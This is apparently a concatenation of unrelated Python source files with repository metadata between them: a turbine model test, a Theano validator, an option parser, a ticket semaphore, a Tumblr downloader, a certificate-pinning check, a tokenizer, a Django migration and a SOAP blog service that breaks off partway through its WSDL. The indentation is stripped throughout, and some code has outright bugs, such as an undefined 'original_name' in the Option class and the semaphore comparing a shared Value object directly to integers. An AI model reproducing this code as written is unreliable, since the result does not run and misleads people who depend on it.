self.prob['turbine.s_Np'] = data[h_map['turb.s_NpDes']]
self.prob['turbine.map.NpMap']= data[h_map['turb.NpMap']]
self.prob['turbine.map.PRmap']= data[h_map['turb.PRmap']]
# input flowstation variables
self.prob['flow_start.P'] = data[h_map['burn.Fl_I.Pt']]
self.prob['flow_start.T'] = data[h_map['burn.Fl_I.Tt']]
self.prob['flow_start.W'] = data[h_map['burn.Fl_I.W']]
self.prob['turbine.PR'] = data[h_map['turb.PR']]
# input shaft variable
self.prob['turbine.Nmech'] = data[h_map['shaft.Nmech']]
# input burner variable
self.prob['burner.Fl_I:FAR'] = data[h_map['burn.FAR']]
self.prob['turbine.area'] = data[h_map['turb.Fl_O.A']]
self.prob.run_model()
print('---- Test Case', i, ' ----')
print("corrParams --")
print("Wp", self.prob['turbine.Wp'][0], data[h_map['turb.Wp']])
print("Np", self.prob['turbine.Np'][0], data[h_map['turb.Np']])
print("flowConv---")
print("PR ", self.prob['turbine.PR'][0], data[h_map['turb.PR']])
print("mapInputs---")
print("NpMap", self.prob['turbine.map.readMap.NpMap'][0], data[h_map['turb.NpMap']])
print("PRmap", self.prob['turbine.map.readMap.PRmap'][0], data[h_map['turb.PRmap']])
print("readMap --")
print(
"effMap",
self.prob['turbine.map.scaledOutput.effMap'][0],
data[
h_map['turb.effMap']])
print(
"WpMap",
self.prob['turbine.map.scaledOutput.WpMap'][0],
data[
h_map['turb.WpMap']])
print("Scaled output --")
print("eff", self.prob['turbine.eff'][0], data[h_map['turb.eff']])
tol = 1.0e-3
print()
npss = data[h_map['burn.Fl_I.Pt']]
pyc = self.prob['flow_start.Fl_O:tot:P'][0]
print('Pt in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['burn.Fl_I.s']]
pyc = self.prob['flow_start.Fl_O:tot:S'][0]
print('S in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.W']]
pyc = self.prob['turbine.Fl_O:stat:W'][0]
print('W in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.ht']] - data[h_map['turb.Fl_I.ht']]
pyc = self.prob['turbine.Fl_O:tot:h'][0] - self.prob['burner.Fl_O:tot:h'][0]
print('delta h:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_I.s']]
pyc = self.prob['burner.Fl_O:tot:S'][0]
print('S in:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.s']]
pyc = self.prob['turbine.Fl_O:tot:S'][0]
print('S out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.pwr']]
pyc = self.prob['turbine.power'][0]
print('Power:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.Pt']]
pyc = self.prob['turbine.Fl_O:tot:P'][0]
print('Pt out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
# these fail downstream of combustor
npss = data[h_map['turb.Fl_O.Ps']]
pyc = self.prob['turbine.Fl_O:stat:P'][0]
print('Ps out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
npss = data[h_map['turb.Fl_O.Ts']]
pyc = self.prob['turbine.Fl_O:stat:T'][0]
print('Ts out:', npss, pyc)
assert_near_equal(pyc, npss, tol)
print("")
print()
if __name__ == "__main__":
unittest.main()
|
apache-2.0
| 5,855,211,299,384,399,000
| 31.534562
| 96
| 0.525779
| false
| 2.904155
| true
| false
| false
|
Superjom/NeuralNetworks
|
apps/126/validate.py
|
1
|
4599
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Created on March 3, 2014
@author: Chunwei Yan @ PKU
@mail: yanchunwei@outlook.com
'''
from __future__ import division
import sys
import theano
import math
import numpy
from theano import scalar as T
import cPickle as pickle
import argparse
sys.path.append('../..')
from models.stacked_autoencoder import StackedAutoEncoder
from dataset import Dataset as DenoDataset
def load_dataset(dataset_ph):
'''
test if the file in pickle format
predict if the file in csv format
'''
dataset_ph = dataset_ph
if dataset_ph.endswith('.pk'):
with open(dataset_ph) as f:
dataset = pickle.load(f)
else:
print '!!\tdataset is in csv format'
print '!!!\tattention: validator will ignore the first line'
deno_dataset = DenoDataset(dataset_ph)
records = deno_dataset.load_records_to_norm_float()
dataset = (records, None)
return dataset
def load_model(path):
'''
load pretrained StackedAutoencoder object from a file
'''
with open(path, 'rb') as f:
model = pickle.load(f)
return model
class Validator(object):
'''
given some records and predict label
'''
def __init__(self, dataset, model):
self.dataset = dataset
self.model = model
self._init()
def _init(self):
try:
train_fn, self.predict_fn = self.model.compile_finetune_funcs()
except:
self.predict_fn = self.model.compile_predict_fn()
def predict(self):
res = []
records,labels = self.dataset
n_records = records.shape[0]
for i in range(n_records):
x = records[i:i+1]
#print 'x:', x
y = self.predict_fn(x)[0]
#print 'y:', y, labels[i]
res.append(y)
return res
def batch_predict(self):
'''
predict by batch
'''
records,labels = self.dataset
n_records = records.shape[0]
batch_size = 40
n_batches = int(math.ceil(n_records/batch_size))
res = []
for i in xrange(n_batches):
x = records[i*batch_size:(i+1) * batch_size]
#print 'x', x
# to fix a bug
x_size = x.shape[0]
if x_size < batch_size:
#print 'x_size < batch_size', x_size, batch_size
x = records[-batch_size:]
y_preds = self.predict_fn(x)[0]
y_preds = y_preds[-x_size:]
else:
y_preds = self.predict_fn(x)[0]
#print 'y_preds', y_preds
for y in y_preds:
res.append(y)
#res.append(y_preds)
return res
def validate(self):
records,labels = self.dataset
labels = list(labels)
n_records = records.shape[0]
#res = self.batch_predict()
res = self.predict()
#print 'predict res', res
num = 0
#print 'labels', labels
print 'len res labels', len(res), len(labels)
for i in xrange(n_records):
if res[i] == labels[i]:
num += 1.0
#num = len(filter(lambda x:x, res == labels))
#print 'num', num
c_rate = num/n_records
print 'Correct rate:', c_rate
print 'Error rate:', 1 - c_rate
return c_rate
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description = "predict and validate")
parser.add_argument('-d', action='store',
dest='dataset_ph', help='path to dataset'
)
parser.add_argument('-t', action='store',
dest='task', help='task: validate or predict',
)
parser.add_argument('-m', action='store',
dest='model_ph', help='path of model file',
)
parser.add_argument('-f', action='store',
dest='topath', help='path of output file'
)
if len(sys.argv) == 1:
parser.print_help()
exit(-1)
args = parser.parse_args()
dataset = load_dataset(args.dataset_ph)
model = load_model(args.model_ph)
validator = Validator(
dataset = dataset,
model = model,
)
# task
if args.task == 'predict':
res = validator.batch_predict()
print 'predict %d labels' % len(res)
with open(args.topath, 'w') as f:
f.write(
'\n'.join([str(s) for s in res]))
elif args.task == 'validate':
validator.validate()
else:
print 'unrecognized task: "%s"' % args.task
# TODO to file?
|
apache-2.0
| -510,086,034,167,619,840
| 25.738372
| 75
| 0.543379
| false
| 3.720874
| false
| false
| false
|
azure-satellite/pyunite
|
pyunite/option.py
|
1
|
3196
|
import re
from itertools import imap
from collections import namedtuple
import funcy as fn
option = namedtuple('option', ['name', 'value'])
# Options can be specified in the PyUnite command line. They are merged into a
# state that uniquely identifies a PyUnite buffer.
default_options = dict(
# Scope of a PyUnite buffer:
# - global: Buffer is global. The quickfix list behaves like this.
# - tabpage: Buffer is tab local.
# - window: Buffer is window local. The location list behaves like this.
# Notice that there could actually be more than one PyUnite buffer per
# scope if other PyUnite buffers in the same scope are marked as
# replaceable.
scope='tabpage',
# Whether to quit if another PyUnite in the same scope is being opened
replace=True,
# Height if horizontal split. Width if vertical split. Zero means don't
# resize the window.
size=0,
# Split vertically instead of horizontally
vsplit=False,
# Direction of the window split. See
# https://technotales.wordpress.com/2010/04/29/vim-splits-a-guide-to-doing-exactly-what-you-want/
direction='leftabove',
# Don't open window when there are no candidates
close_on_empty=False,
# Steal focus from current window
focus_on_open=False,
# Close window after performing an action on a candidate
close_on_action=False,
# Leave window after performing an action on a candidate
leave_on_action=False,
)
class Option(object):
def __init__(self, name, value):
self.name = name
self.value = value
error_msg = 'Option "{}" is not recognized'.format(original_name)
assert name in default_options, error_msg
expected_type = type(default_options[name])
error_msg = 'Expected value of {} for option "{}"'.format(str(expected_type), original_name)
assert type(value) == expected_type, error_msg
if name == 'scope':
scopes = ['global', 'tabpage', 'window']
error = 'Option "-scope" has to be one of {}'.format(str(scopes))
assert value in scopes, error
if name == 'direction':
directions = ['topleft', 'botright', 'leftabove', 'rightbelow']
error = 'Option "-direction" has to be one of {}'.format(str(directions))
assert value in directions, error
def format_option(self):
name = re.sub('_', '-', self.name)
if isinstance(default_options[self.name], bool):
if self.value:
return '-{}'.format(name)
else:
return '-no-{}'.format(name)
else:
return '-{}='.format(name)
def format(self):
original_name = '-' + re.sub('_', '-', name)
def parse_option(string):
if '=' not in string:
string += '='
name, value = re.split('=', string)
if value == '':
value = False if name.startswith('-no-') else True
else:
value = fn.silent(eval)(value) or value
name = re.sub('-', '_', re.sub('^(-no-|-)', '', name))
return Option(name=name, value=value)
def format_options(options):
return fn.iflatten(imap(format_option, options))
|
bsd-3-clause
| 6,447,050,693,128,628,000
| 35.318182
| 102
| 0.623279
| false
| 3.950556
| false
| false
| false
|
Saevon/Recipes
|
python/ticket_semaphore.py
|
1
|
2045
|
import contextlib
import multiprocessing
import time
import ctypes
class Ticket():
''' A ticket from a TicketSemaphore '''
def __init__(self, ticketer, size):
self.size = size
self.ticketer = ticketer
def release(self, *args, **kwargs):
''' Releases this ticket from the owning ticketer '''
self.ticketer.release(self, *args, **kwargs)
class TicketSemaphore():
'''
Semaphore that allows grabbing different size of product
ticketer = TicketSemaphore(10)
ticket = ticketer.acquire(3)
ticket.release()
with ticketer(size=3):
pass
'''
def __init__(self, size):
self.available = multiprocessing.Value(ctypes.c_int)
self.size = size
self.lock = multiprocessing.Condition()
def acquire(self, timeout=None, size=1):
''' Grabs a ticket of the given size '''
time_left = None
if timeout:
start = time.time()
time_left = timeout
self.lock.acquire(timeout=time_left)
# Wait until there is enough space
while self.available < size:
if timeout:
time_left = timeout - (time.time() - start)
try:
self.lock.wait(timeout=time_left)
except RuntimeError:
# We've run out of time
return False
# The ticket is ours!
self.available -= size
return Ticket(self, size)
def release(self, ticket):
''' Releases the given ticket '''
with self.lock:
self.available += ticket.size
if self.available >= self.size:
raise OverflowError("Too many tickets returned")
def __call__(self, **kwargs):
''' ContextManager with arguments '''
@contextlib.contextmanager
def with_ticket_lock():
try:
ticket = self.acquire(**kwargs)
yield ticket
finally:
if ticket:
ticket.release()
|
mit
| -3,672,569,619,838,448,000
| 24.5625
| 64
| 0.556479
| false
| 4.514349
| false
| false
| false
|
alvarofe/cassle
|
handlers/pin.py
|
1
|
1816
|
from handlers import handlers
from handlers import handler
from conf import config, debug_logger
from handlers.base import BaseHandler
from db.database import PinDB
import logging
from notification.event_notification import MITMNotification
import base64
logger = logging.getLogger(__name__)
#TODO rewrite this handler to do it properly
@handler(handlers, isHandler=config.V_PINNING)
class Pinning(BaseHandler):
name = "pinning"
def __init__(self, cert, ocsp):
super(Pinning, self).__init__(cert, ocsp)
self.on_certificate(cert)
def on_certificate(self, cert):
name = cert.subject_common_name()
issuer_name = cert.issuer_common_name()
query = db.get(name)
if query is None:
debug_logger.debug(
"\t[-] You have not pinned this certificate %s" % name)
return
try:
spki = cert.hash_spki(deep=1, algorithm="sha256")
spki = base64.b64encode(spki)
except:
logger.error("Getting spki of the intermediate CA %s" % name)
return
try:
issuers = query["issuers"]
for i in issuers[issuer_name]:
if spki == i:
debug_logger.debug("\t[+] pin correct %s " % name)
return
logger.info("\t[-] Pin does not match %s" % name)
debug_logger.debug("\t[-] Pin does not match %s" % name)
MITMNotification.notify(
title="Pinning",
message=cert.subject_common_name())
except:
MITMNotification.notify(
title="Pinning",
message="Issuer different")
debug_logger.debug("\t[-] issuer with different name %s" % name)
db = PinDB(config.DB_NAME, "pinning")
|
gpl-3.0
| -4,842,815,281,196,532,000
| 29.779661
| 76
| 0.5837
| false
| 3.939262
| false
| false
| false
|
kcarnold/counterfactual-lm
|
code/tokenization.py
|
1
|
2976
|
import re
import string
from nltk.tokenize import RegexpTokenizer, PunktSentenceTokenizer
WORD_RE = re.compile(r'\w+(?:[\',:]\w+)*')
END_PUNCT = set('.,?!:')
def token_spans(text):
for match in re.finditer(r'[^-/\s]+', text):
start, end = match.span()
token_match = WORD_RE.search(text, start, end)
if token_match is not None:
span = token_match.span()
yield span
tok_end = span[1]
if tok_end < end and text[tok_end] in END_PUNCT:
yield tok_end, tok_end + 1
START_DOC = '<D>'
START_PARA = '<P>'
START_SENT = '<S>'
END_SENT = '</S>'
paragraph_re = re.compile(r'(?:[ ]*[^\s][^\n]*[\n]?)+')
paragraph_tokenizer = RegexpTokenizer(paragraph_re)
sentence_tokenizer = PunktSentenceTokenizer()
def tokenize(doc):
res = [START_DOC]
afters = []
end_of_prev_para = 0
for para_start, para_end in paragraph_tokenizer.span_tokenize(doc):
afters.append(doc[end_of_prev_para:para_start])
para = doc[para_start:para_end]
end_of_prev_para = para_end
end_of_prev_sentence = 0
res.append(START_PARA)
for sent_start, sent_end in sentence_tokenizer.span_tokenize(para):
sent = para[sent_start:sent_end]
tspans = list(token_spans(sent))
if not tspans:
continue
afters.append(para[end_of_prev_sentence:sent_start])
end_of_prev_sentence = sent_end
res.append(START_SENT)
end_of_prev_token = 0
for tok_start, tok_end in tspans:
afters.append(sent[end_of_prev_token:tok_start])
res.append(sent[tok_start:tok_end])
end_of_prev_token = tok_end
res.append(END_SENT)
afters.append(sent[end_of_prev_token:])
end_of_prev_para -= len(para) - end_of_prev_sentence
afters.append(doc[end_of_prev_para:])
return res, afters
def tokenize_mid_document(doc_so_far):
if len(doc_so_far.strip()) == 0:
return [START_DOC, START_PARA, START_SENT, ''], ['', '', '', '']
tok_list, afters = tokenize(doc_so_far)
if doc_so_far.endswith('\n\n'):
# starting a new paragraph
if tok_list[-1] in [START_PARA, START_SENT]:
print("Huh? Ended with double-newlines but also with start-of-para?", repr(tok_list[-5:]))
tok_list += [START_PARA, START_SENT, '']
afters += ['', '', '']
else:
assert tok_list[-1] == END_SENT
if tok_list[-2] in '.?!':
# Real EOS
tok_list += [START_SENT, '']
afters += ['', '']
elif doc_so_far[-1] in string.whitespace:
# The last EOS was spurious, but we're not mid-word.
tok_list[-1] = ""
else:
# The last EOS was spurious, but we ARE mid-word.
tok_list.pop(-1)
after = afters.pop(-1)
afters[-1] += after
return tok_list, afters
|
mit
| 1,327,267,331,160,409,600
| 34.011765
| 102
| 0.552755
| false
| 3.256018
| false
| false
| false
|
derdmitry/socraticqs2
|
mysite/psa/migrations/0003_auto_20150420_0308.py
|
1
|
1092
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('default', '0001_initial'),
('psa', '0002_usersession'),
]
operations = [
migrations.CreateModel(
name='SecondaryEmail',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('email', models.EmailField(max_length=75, verbose_name=b'Secondary Email')),
('provider', models.ForeignKey(to='default.UserSocialAuth')),
('user', models.ForeignKey(related_name='secondary', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='secondaryemail',
unique_together=set([('provider', 'email')]),
),
]
|
apache-2.0
| -710,191,695,645,804,500
| 32.090909
| 114
| 0.576923
| false
| 4.512397
| false
| false
| false
|
lilydjwg/you-get
|
src/you_get/extractors/tumblr.py
|
1
|
4239
|
#!/usr/bin/env python
__all__ = ['tumblr_download']
from ..common import *
from .universal import *
from .dailymotion import dailymotion_download
from .vimeo import vimeo_download
from .vine import vine_download
def tumblr_download(url, output_dir='.', merge=True, info_only=False, **kwargs):
if re.match(r'https?://\d+\.media\.tumblr\.com/', url):
universal_download(url, output_dir, merge=merge, info_only=info_only)
return
html = parse.unquote(get_html(url)).replace('\/', '/')
feed = r1(r'<meta property="og:type" content="tumblr-feed:(\w+)" />', html)
if feed in ['photo', 'photoset', 'entry'] or feed is None:
# try to extract photos
page_title = r1(r'<meta name="description" content="([^"\n]+)', html) or \
r1(r'<meta property="og:description" content="([^"\n]+)', html) or \
r1(r'<title>([^<\n]*)', html)
urls = re.findall(r'(https?://[^;"&]+/tumblr_[^;"]+_\d+\.jpg)', html) +\
re.findall(r'(https?://[^;"&]+/tumblr_[^;"]+_\d+\.png)', html) +\
re.findall(r'(https?://[^;"&]+/tumblr_[^";]+_\d+\.gif)', html)
tuggles = {}
for url in urls:
filename = parse.unquote(url.split('/')[-1])
title = '.'.join(filename.split('.')[:-1])
tumblr_id = r1(r'^tumblr_(.+)_\d+$', title)
quality = int(r1(r'^tumblr_.+_(\d+)$', title))
ext = filename.split('.')[-1]
size = int(get_head(url)['Content-Length'])
if tumblr_id not in tuggles or tuggles[tumblr_id]['quality'] < quality:
tuggles[tumblr_id] = {
'title': title,
'url': url,
'quality': quality,
'ext': ext,
'size': size,
}
if tuggles:
size = sum([tuggles[t]['size'] for t in tuggles])
print_info(site_info, page_title, None, size)
if not info_only:
for t in tuggles:
title = tuggles[t]['title']
ext = tuggles[t]['ext']
size = tuggles[t]['size']
url = tuggles[t]['url']
print_info(site_info, title, ext, size)
download_urls([url], title, ext, size,
output_dir=output_dir)
return
# feed == 'audio' or feed == 'video' or feed is None
# try to extract video / audio
real_url = r1(r'source src=\\x22([^\\]+)\\', html)
if not real_url:
real_url = r1(r'audio_file=([^&]+)&', html)
if real_url:
real_url = real_url + '?plead=please-dont-download-this-or-our-lawyers-wont-let-us-host-audio'
if not real_url:
real_url = r1(r'<source src="([^"]*)"', html)
if not real_url:
iframe_url = r1(r'<iframe[^>]+src=[\'"]([^\'"]*)[\'"]', html)
if iframe_url[:2] == '//': iframe_url = 'http:' + iframe_url
if re.search(r'player\.vimeo\.com', iframe_url):
vimeo_download(iframe_url, output_dir, merge=merge, info_only=info_only,
referer='http://tumblr.com/', **kwargs)
return
elif re.search(r'dailymotion\.com', iframe_url):
dailymotion_download(iframe_url, output_dir, merge=merge, info_only=info_only, **kwargs)
return
elif re.search(r'vine\.co', iframe_url):
vine_download(iframe_url, output_dir, merge=merge, info_only=info_only, **kwargs)
return
else:
iframe_html = get_content(iframe_url)
real_url = r1(r'<source src="([^"]*)"', iframe_html)
title = unescape_html(r1(r'<meta property="og:title" content="([^"]*)" />', html) or
r1(r'<meta property="og:description" content="([^"]*)" />', html) or
r1(r'<title>([^<\n]*)', html) or url.split("/")[4]).replace('\n', '')
type, ext, size = url_info(real_url)
print_info(site_info, title, type, size)
if not info_only:
download_urls([real_url], title, ext, size, output_dir, merge = merge)
site_info = "Tumblr.com"
download = tumblr_download
download_playlist = playlist_not_supported('tumblr')
|
mit
| 514,626,946,501,440,450
| 42.255102
| 106
| 0.513565
| false
| 3.296267
| false
| false
| false
|
mikeckennedy/consuming_services_python_demos
|
services/consuming_services_apis/consuming_services_apis/api/blog_soap.py
|
1
|
17656
|
from datetime import datetime
from pyramid.httpexceptions import exception_response
from pyramid.view import view_config
from pyramid.response import Response
from xml.etree import ElementTree
from consuming_services_apis import Post
from consuming_services_apis.data.memory_db import MemoryDb
@view_config(route_name='soap')
def blog_posts(request):
print("Processing {} request from {} for the SOAP service: {}, ua: {}".format( # noqa
request.method, get_ip(request), request.url, request.user_agent
))
if "WSDL" in request.GET or "wsdl" in request.GET:
return Response(body=build_wsdl(request), content_type='application/xml') # noqa
action = request.headers.get('Soapaction').replace('http://tempuri.org/', '').lower().strip("\"") # noqa
if action == 'getpost':
body = clean_namespaces(request.body.decode('utf-8'))
dom = ElementTree.fromstring(body)
return get_post_response(dom, request)
if action == 'allposts':
return all_post_response(request)
if action == 'createpost':
body = clean_namespaces(request.body.decode('utf-8'))
print("CREATE VIA:" + body)
dom = ElementTree.fromstring(body)
return create_post(dom, request)
if action == 'updatepost':
body = clean_namespaces(request.body.decode('utf-8'))
print("UPDATE VIA:" + body)
dom = ElementTree.fromstring(body)
return update_post(dom, request)
if action == 'deletepost':
body = clean_namespaces(request.body.decode('utf-8'))
dom = ElementTree.fromstring(body)
return delete_post_response(dom, request)
print("BODY: {}".format(request.body.decode('utf-8')))
return Response("<TEST />")
def all_post_response(request):
posts = MemoryDb.get_posts(get_ip(request))
post_template = """
<Post>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</Post>"""
posts_fragments = [
post_template.format(p.id, p.title, p.published, p.content, p.view_count) # noqa
for p in posts
]
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<AllPostsResponse xmlns="http://tempuri.org/">
<AllPostsResult>
{}
</AllPostsResult>
</AllPostsResponse>
</soap:Body>
</soap:Envelope>""".format("\n".join(posts_fragments)) # noqa
return Response(body=resp_xml, content_type='text/xml')
def get_post_response(dom, request):
id_text = dom.find('Body/GetPost/id').text
post = MemoryDb.get_post(id_text, get_ip(request))
if not post:
raise exception_response(404)
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetPostResponse xmlns="http://tempuri.org/">
<GetPostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</GetPostResult>
</GetPostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def delete_post_response(dom, request):
id_text = dom.find('Body/DeletePost/id').text
post = MemoryDb.get_post(id_text, get_ip(request))
if not post:
raise exception_response(404)
if MemoryDb.is_post_read_only(post.id):
raise exception_response(403)
MemoryDb.delete_post(post, get_ip(request))
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DeletePostResponse xmlns="http://tempuri.org/" />
</soap:Body>
</soap:Envelope>""" # noqa
return Response(body=resp_xml, content_type='text/xml')
def create_post(dom, request):
title = dom.find('Body/CreatePost/title').text
content = dom.find('Body/CreatePost/content').text
view_count = int(dom.find('Body/CreatePost/viewCount').text)
now = datetime.now()
published = "{}-{}-{}".format(now.year, str(now.month).zfill(2), str(now.day).zfill(2)) # noqa
post = Post(
title,
content,
view_count,
published
)
trim_post_size(post)
MemoryDb.add_post(post, get_ip(request))
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<CreatePostResponse xmlns="http://tempuri.org/">
<CreatePostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</CreatePostResult>
</CreatePostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def update_post(dom, request):
post_id = dom.find('Body/UpdatePost/id').text
post = MemoryDb.get_post(post_id, get_ip(request))
if not post:
raise exception_response(404)
if MemoryDb.is_post_read_only(post_id):
raise exception_response(403)
post.title = dom.find('Body/UpdatePost/title').text
post.content = dom.find('Body/UpdatePost/content').text
post.view_count = int(dom.find('Body/UpdatePost/viewCount').text)
resp_xml = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UpdatePostResponse xmlns="http://tempuri.org/">
<UpdatePostResult>
<Id>{}</Id>
<Title>{}</Title>
<Published>{}</Published>
<Content>{}</Content>
<ViewCount>{}</ViewCount>
</UpdatePostResult>
</UpdatePostResponse>
</soap:Body>
</soap:Envelope>""".format(post.id, post.title, post.published, post.content, post.view_count) # noqa
return Response(body=resp_xml, content_type='text/xml')
def get_ip(request):
# The real IP is stripped by nginx and the direct request
# looks like a call from localhost. I've configured nginx
# to pass the IP it sees under the header X-Real-IP.
proxy_pass_real_ip = request.headers.get('X-Real-IP')
if proxy_pass_real_ip:
return proxy_pass_real_ip
elif request.remote_addr:
return request.remote_addr
else:
return request.client_addr
def clean_namespaces(body):
return (
body.replace('SOAP-ENV:', '')
.replace('xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"', '') # noqa
.replace('xmlns:ns0="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:ns1="http://tempuri.org/"', '')
.replace('xmlns:ns0="http://tempuri.org/"', '')
.replace('xmlns:ns1="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"', '') # noqa
.replace('soap:', '')
.replace('xmlns:xsd="http://www.w3.org/2001/XMLSchema"', '')
.replace('xmlns="http://tempuri.org/"', '')
.replace('SOAP-ENV:', '')
.replace('ns0:', '')
.replace('ns1:', '')) # noqa
def build_wsdl(request):
wsdl = """
<wsdl:definitions xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:tns="http://tempuri.org/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://schemas.xmlsoap.org/wsdl/soap12/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" targetNamespace="http://tempuri.org/">
<wsdl:types>
<s:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/">
<s:element name="AllPosts">
<s:complexType/>
</s:element>
<s:element name="AllPostsResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="AllPostsResult" type="tns:ArrayOfPost"/>
</s:sequence>
</s:complexType>
</s:element>
<s:complexType name="ArrayOfPost">
<s:sequence>
<s:element minOccurs="0" maxOccurs="unbounded" name="Post" nillable="true" type="tns:Post"/>
</s:sequence>
</s:complexType>
<s:complexType name="Post">
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="Id" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="Title" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="Published" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="Content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="ViewCount" type="s:int"/>
</s:sequence>
</s:complexType>
<s:element name="GetPost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="GetPostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="GetPostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="CreatePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="title" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="viewCount" type="s:int"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="CreatePostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="CreatePostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="UpdatePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="title" type="s:string"/>
<s:element minOccurs="0" maxOccurs="1" name="content" type="s:string"/>
<s:element minOccurs="1" maxOccurs="1" name="viewCount" type="s:int"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="UpdatePostResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="UpdatePostResult" type="tns:Post"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="DeletePost">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="DeletePostResponse">
<s:complexType/>
</s:element>
</s:schema>
</wsdl:types>
<wsdl:message name="AllPostsSoapIn">
<wsdl:part name="parameters" element="tns:AllPosts"/>
</wsdl:message>
<wsdl:message name="AllPostsSoapOut">
<wsdl:part name="parameters" element="tns:AllPostsResponse"/>
</wsdl:message>
<wsdl:message name="GetPostSoapIn">
<wsdl:part name="parameters" element="tns:GetPost"/>
</wsdl:message>
<wsdl:message name="GetPostSoapOut">
<wsdl:part name="parameters" element="tns:GetPostResponse"/>
</wsdl:message>
<wsdl:message name="CreatePostSoapIn">
<wsdl:part name="parameters" element="tns:CreatePost"/>
</wsdl:message>
<wsdl:message name="CreatePostSoapOut">
<wsdl:part name="parameters" element="tns:CreatePostResponse"/>
</wsdl:message>
<wsdl:message name="UpdatePostSoapIn">
<wsdl:part name="parameters" element="tns:UpdatePost"/>
</wsdl:message>
